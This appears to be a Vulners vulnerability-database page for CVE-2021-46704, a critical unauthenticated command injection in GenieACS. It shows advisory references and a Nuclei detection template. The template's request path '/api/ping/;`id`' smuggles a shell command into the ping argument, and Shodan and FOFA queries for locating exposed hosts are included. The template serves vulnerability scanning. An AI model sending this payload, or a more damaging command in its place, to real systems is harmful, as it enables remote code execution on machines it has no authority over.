| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| Exploit for OS Command Injection in Genieacs | 21 Jun 202312:29 | – | githubexploit | |
| Exploit for OS Command Injection in Genieacs | 22 Jun 202305:03 | – | githubexploit | |
| CVE-2021-46704 | 6 Mar 202207:15 | – | attackerkb | |
| CVE-2021-46704 | 22 Apr 202502:52 | – | circl | |
| GenieACS 操作系统命令注入漏洞 | 6 Mar 202200:00 | – | cnnvd | |
| GenieACS OS Command Injection Vulnerability | 8 Mar 202200:00 | – | cnvd | |
| CVE-2021-46704 | 6 Mar 202206:23 | – | cve | |
| CVE-2021-46704 | 6 Mar 202206:23 | – | cvelist | |
| OS Command Injection in GenieACS | 7 Mar 202200:00 | – | github | |
| CVE-2021-46704 | 6 Mar 202207:15 | – | nvd |
id: CVE-2021-46704
info:
name: GenieACS => 1.2.8 - OS Command Injection
author: DhiyaneshDK
severity: critical
description: |
In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system.
remediation: |
Upgrade to a patched version of GenieACS or apply the necessary security patches to mitigate the vulnerability.
reference:
- https://twitter.com/shaybt12/status/1671598239835906058
- https://github.com/advisories/GHSA-2877-693q-pj33
- https://nvd.nist.gov/vuln/detail/CVE-2021-46704
- https://github.com/genieacs/genieacs/commit/7f295beeecc1c1f14308a93c82413bb334045af6
- https://github.com/genieacs/genieacs/releases/tag/v1.2.8
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-46704
cwe-id: CWE-78
epss-score: 0.21901
epss-percentile: 0.97352
cpe: cpe:2.3:a:genieacs:genieacs:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: genieacs
product: genieacs
shodan-query:
- http.favicon.hash:-2098066288
- http.html:"genieacs"
fofa-query:
- body="genieacs"
- icon_hash=-2098066288
tags: cve2021,cve,genieacs,rce,vuln
http:
- method: GET
path:
- "{{BaseURL}}/api/ping/;`id`"
matchers-condition: and
matchers:
- type: word
part: header
words:
- text/plain
- type: regex
part: body
regex:
- "uid=([0-9]+)"
- type: status
status:
- 500
extractors:
- type: regex
regex:
- uid=(\d+)\((\w+)\)
part: body
# digest: 4b0a004830460221009424eb597c89cbd69e3145fba5f7765789a32e9a94db70daf25b0e4915d38f28022100f7dc35f1a4e258f24f20abfa34fe0fe8e1c066f1de1002936c9cb824ae184763:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation